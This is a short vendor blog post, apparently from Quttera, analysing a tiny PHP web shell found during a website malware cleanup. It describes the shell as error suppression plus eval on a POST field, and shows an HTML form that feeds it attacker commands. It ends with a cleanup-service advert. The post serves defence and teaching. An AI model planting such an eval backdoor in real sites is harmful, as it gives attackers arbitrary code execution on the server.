PHP is a general server-side scripting language providing very reach arsenal for web development.
As a part of it, PHP provides broad capabilities to develop generic shells that can run on almost every website.
In the recent website malware cleanup process we detected generic shell that occupied only 18 characters. The following is the code of this shell capable of executing any arbitrary malicious content submitted by attackers.
This shell has three major parts
- @ - PHP Error control operator making PHP interpreter to ignore any occured error (http://php.net/manual/en/language.operators.errorcontrol.php)
- eval - Evaluate a string as PHP code and allows execution of arbitrary PHP code provided as an input string
- $_POST[yt] - Is actually shell payload submitted by attacker
Following is example of HTML side code used to submit the shell paylload
<form action="/action_post.php" method="post">
shell: <input type="text" name="yt">
<input type="submit" value="Submit">
Is your website flagged for malware, blocked by the search engines or disabled by the host?
Our experts are here to clean up any malware from your sites and remove false-positives, blacklisting and other kinds of alerts by any security vendor and search engines. Just select from suitable ThreatSign! Anti-Malware Plan and get back online.
For other issues and help: Quttera’s help-desk